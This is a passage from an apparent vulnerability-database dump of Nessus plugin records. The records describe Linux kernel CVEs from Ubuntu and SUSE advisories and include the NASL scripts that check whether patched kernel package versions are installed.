with\nadministrative privileges. (CVE-2016-3134)\n\nBen Hawkes discovered an integer overflow in the Linux netfilter\nimplementation. On systems running 32 bit kernels, a local\nunprivileged attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code with administrative\nprivileges. (CVE-2016-3135)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nIt was discovered that a race condition existed when handling\nheartbeat- timeout events in the SCTP implementation of the Linux\nkernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\nperformed a double-free. A local attacker with physical access could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2930-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-4.2-generic,\nlinux-image-4.2-generic-lpae and / or linux-image-4.2-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(15\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-7566\", \"CVE-2015-8767\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2782\", \"CVE-2016-3134\", \"CVE-2016-3135\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2930-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-34-generic\", pkgver:\"4.2.0-34.39\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-34-generic-lpae\", pkgver:\"4.2.0-34.39\")) flag++;\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-34-lowlatency\", pkgver:\"4.2.0-34.39\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-generic / linux-image-4.2-generic-lpae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:38:14", "description": "Ralf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the Linux kernel's CXGB3 driver. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the Linux Extended Verification Module (EVM). An attacker could use this to affect system integrity. (CVE-2016-2085)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted file descriptors to the original opener for in-flight file descriptors sent over a unix domain socket. A local attacker could use this to cause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782)\n\nIt was discovered that the Linux kernel did not enforce limits on the amount of data allocated to buffer pipes. A local attacker could use this to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-04-07T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : Linux kernel (Utopic HWE) vulnerabilities (USN-2948-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7566", "CVE-2015-7833", "CVE-2015-8812", "CVE-2016-0723", "CVE-2016-2085", "CVE-2016-2550", "CVE-2016-2782", "CVE-2016-2847"], "modified": "2023-10-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-69-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-69-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-69-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-69-powerpc-e500mc", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-69-powerpc-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-69-powerpc64-emb", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-69-powerpc64-smp", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts"], "id": "UBUNTU_USN-2948-1.NASL", "href": "https://www.tenable.com/plugins/nessus/90405", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2948-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90405);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/20\");\n\n script_cve_id(\n \"CVE-2015-7566\",\n \"CVE-2015-7833\",\n \"CVE-2015-8812\",\n \"CVE-2016-0723\",\n \"CVE-2016-2085\",\n \"CVE-2016-2550\",\n \"CVE-2016-2782\",\n \"CVE-2016-2847\"\n );\n script_xref(name:\"USN\", value:\"2948-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : Linux kernel (Utopic HWE) vulnerabilities (USN-2948-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Ralf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux\nkernel did not properly sanity check the interfaces and endpoints\nreported by the device. An attacker with physical access could cause a\ndenial of service (system crash). (CVE-2015-7833)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the\nLinux kernel's CXGB3 driver. A local attacker could use this to cause\na denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the\nLinux Extended Verification Module (EVM). An attacker could use this\nto affect system integrity. (CVE-2016-2085)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted\nfile descriptors to the original opener for in-flight file descriptors\nsent over a unix domain socket. A local attacker could use this to\ncause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782)\n\nIt was discovered that the Linux kernel did not enforce limits on the\namount of data allocated to buffer pipes. A local attacker could use\nthis to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-2948-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8812\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-69-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-69-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-69-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-69-powerpc-e500mc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-69-powerpc-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-69-powerpc64-emb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-69-powerpc64-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\ninclude('ksplice.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar kernel_mappings = {\n '14.04': {\n '3.16.0': {\n 'generic': '3.16.0-69',\n 'generic-lpae': '3.16.0-69',\n 'lowlatency': '3.16.0-69',\n 'powerpc-e500mc': '3.16.0-69',\n 'powerpc-smp': '3.16.0-69',\n 'powerpc64-emb': '3.16.0-69',\n 'powerpc64-smp': '3.16.0-69'\n }\n }\n};\n\nvar host_kernel_release = get_kb_item_or_exit('Host/uname-r');\nvar host_kernel_version = get_kb_item_or_exit('Host/Debian/kernel-version');\nvar host_kernel_base_version = get_kb_item_or_exit('Host/Debian/kernel-base-version');\nvar host_kernel_type = get_kb_item_or_exit('Host/Debian/kernel-type');\nif(empty_or_null(kernel_mappings[os_release][host_kernel_base_version][host_kernel_type])) audit(AUDIT_INST_VER_NOT_VULN, 'kernel ' + host_kernel_release);\n\nvar extra = '';\nvar kernel_fixed_version = kernel_mappings[os_release][host_kernel_base_version][host_kernel_type];\nif (deb_ver_cmp(ver1:host_kernel_version, ver2:kernel_fixed_version) < 0)\n{\n extra = extra + 'Running Kernel level of ' + host_kernel_version + ' does not meet the minimum fixed level of ' + kernel_fixed_version + ' for this advisory.\\n\\n';\n}\n else\n{\n audit(AUDIT_PATCH_INSTALLED, 'Kernel package for USN-2948-1');\n}\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n var cve_list = make_list('CVE-2015-7566', 'CVE-2015-7833', 'CVE-2015-8812', 'CVE-2016-0723', 'CVE-2016-2085', 'CVE-2016-2550', 'CVE-2016-2782', 'CVE-2016-2847');\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for USN-2948-1');\n }\n else\n {\n extra = extra + ksplice_reporting_text();\n }\n}\nif (extra) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:37:57", "description": "USN-2948-1 fixed vulnerabilities in the Ubuntu 14.10 Linux kernel backported to Ubuntu 14.04 LTS. An incorrect reference counting fix in the radeon driver introduced a regression that could cause a system crash. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the Linux kernel's CXGB3 driver. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2015-8812)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nXiaofei Rex Guo discovered a timing side channel vulnerability in the Linux Extended Verification Module (EVM). An attacker could use this to affect system integrity. (CVE-2016-2085)\n\nDavid Herrmann discovered that the Linux kernel incorrectly accounted file descriptors to the original opener for in-flight file descriptors sent over a unix domain socket. A local attacker could use this to cause a denial of service (resource exhaustion). (CVE-2016-2550)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782)\n\nIt was discovered that the Linux kernel did not enforce limits on the amount of data allocated to buffer pipes. A local attacker could use this to cause a denial of service (resource exhaustion). (CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-04-13T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : Linux kernel (Utopic HWE) regression (USN-2948-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7566", "CVE-2015-7833", "CVE-2015-8812", "CVE-2016-0723", "CVE-2016-2085", "CVE-2016-2550", "CVE-2016-2782", "CVE-2016-2847"], "modified": "2023-10-23T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-70-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-70-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-70-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-70-powerpc-e500mc", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-70-powerpc-smp", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-70-powerpc64-emb", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-70-powerpc64-smp", "cpe:/o:canonical:ubuntu_linux:14.04:-:lts"], "id": "UBUNTU_USN-2948-2.NASL", "href": "https://www.tenable.com/plugins/nessus/90507", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2948-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90507);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/23\");\n\n script_cve_id(\n \"CVE-2015-7566\",\n \"CVE-2015-7833\",\n \"CVE-2015-8812\",\n \"CVE-2016-0723\",\n \"CVE-2016-2085\",\n \"CVE-2016-2550\",\n \"CVE-2016-2782\",\n \"CVE-2016-2847\"\n );\n script_xref(name:\"USN\", value:\"2948-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : Linux kernel (Utopic HWE) regression (USN-2948-2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"USN-2948-1 fixed vulnerabilities in the Ubuntu 14.10 Linux kernel\nbackported to Ubuntu 14.04 LTS. An incorrect reference counting fix in\nthe radeon driver introduced a regression that could cause a system\ncrash. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the\nLinux kernel did not properly sanity check the interfaces\nand endpoints reported by the device. An attacker with\nphysical access could cause a denial of service (system\ncrash). (CVE-2015-7833)\n\nVenkatesh Pottem discovered a use-after-free vulnerability\nin the Linux kernel's CXGB3 driver. A local attacker could\nuse this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2015-8812)\n\nIt was discovered that a race condition existed in the ioctl\nhandler for the TTY driver in the Linux kernel. A local\nattacker could use this to cause a denial of service (system\ncrash) or expose sensitive information. (CVE-2016-0723)\n\nXiaofei Rex Guo discovered a timing side channel\nvulnerability in the Linux Extended Verification Module\n(EVM). An attacker could use this to affect system\nintegrity. (CVE-2016-2085)\n\nDavid Herrmann discovered that the Linux kernel incorrectly\naccounted file descriptors to the original opener for\nin-flight file descriptors sent over a unix domain socket. A\nlocal attacker could use this to cause a denial of service\n(resource exhaustion). (CVE-2016-2550)\n\nRalf Spenneberg discovered that the USB driver for Treo\ndevices in the Linux kernel did not properly sanity check\nthe endpoints reported by the device. An attacker with\nphysical access could cause a denial of service (system\ncrash). (CVE-2016-2782)\n\nIt was discovered that the Linux kernel did not enforce\nlimits on the amount of data allocated to buffer pipes. A\nlocal attacker could use this to cause a denial of service\n(resource exhaustion). (CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-2948-2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-8812\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-70-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-70-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-70-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-70-powerpc-e500mc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-70-powerpc-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-70-powerpc64-emb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.16.0-70-powerpc64-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04:-:lts\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\ninclude('ksplice.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('14.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 14.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar kernel_mappings = {\n '14.04': {\n '3.16.0': {\n 'generic': '3.16.0-70',\n 'generic-lpae': '3.16.0-70',\n 'lowlatency': '3.16.0-70',\n 'powerpc-e500mc': '3.16.0-70',\n 'powerpc-smp': '3.16.0-70',\n 'powerpc64-emb': '3.16.0-70',\n 'powerpc64-smp': '3.16.0-70'\n }\n }\n};\n\nvar host_kernel_release = get_kb_item_or_exit('Host/uname-r');\nvar host_kernel_version = get_kb_item_or_exit('Host/Debian/kernel-version');\nvar host_kernel_base_version = get_kb_item_or_exit('Host/Debian/kernel-base-version');\nvar host_kernel_type = get_kb_item_or_exit('Host/Debian/kernel-type');\nif(empty_or_null(kernel_mappings[os_release][host_kernel_base_version][host_kernel_type])) audit(AUDIT_INST_VER_NOT_VULN, 'kernel ' + host_kernel_release);\n\nvar extra = '';\nvar kernel_fixed_version = kernel_mappings[os_release][host_kernel_base_version][host_kernel_type];\nif (deb_ver_cmp(ver1:host_kernel_version, ver2:kernel_fixed_version) < 0)\n{\n extra = extra + 'Running Kernel level of ' + host_kernel_version + ' does not meet the minimum fixed level of ' + kernel_fixed_version + ' for this advisory.\\n\\n';\n}\n else\n{\n audit(AUDIT_PATCH_INSTALLED, 'Kernel package for USN-2948-2');\n}\n\nif (get_one_kb_item('Host/ksplice/kernel-cves'))\n{\n var cve_list = make_list();\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for USN-2948-2');\n }\n else\n {\n extra = extra + ksplice_reporting_text();\n }\n}\nif (extra) {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:37:45", "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to 3.12.57 to receive various security and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2015-8812: A flaw was found in the CXGB3 kernel driver when the network was considered congested. The kernel would incorrectly misinterpret the congestion as an error condition and incorrectly free/clean up the skb. When the device would then send the skb's queued, these structures would be referenced and may panic the system or allow an attacker to escalate privileges in a use-after-free scenario. (bsc#966437)\n\n - CVE-2015-8816: A malicious USB device could cause a kernel crash in the USB hub driver. (bnc#968010).\n\n - CVE-2016-2143: On zSeries a fork of a large process could have caused memory corruption due to incorrect page table handling. (bnc#970504)\n\n - CVE-2016-2184: A malicious USB device could cause a kernel crash in the alsa usb-audio driver. (bsc#971125).\n\n - CVE-2016-2384: A malicious USB device could cause a kernel crash in the alsa usb-audio driver. (bsc#966693)\n\n - CVE-2016-2782: A malicious USB device could cause a kernel crash in the usb visor driver. (bnc#968670).\n\n - CVE-2016-3139: A malicious USB device could cause a kernel crash in the wacom driver. (bnc#970909).\n\n - CVE-2016-3156: Removal of ipv4 interfaces with a large number of IP addresses was taking very long.\n (bsc#971360).\n\n - CVE-2015-8709: kernel/ptrace.c in the Linux kernel mishandled uid and gid mappings, which allowed local users to gain privileges by establishing a user namespace, waiting for a root process to enter that namespace with an unsafe uid or gid, and then using the ptrace system call. NOTE: the vendor states 'there is no kernel bug here 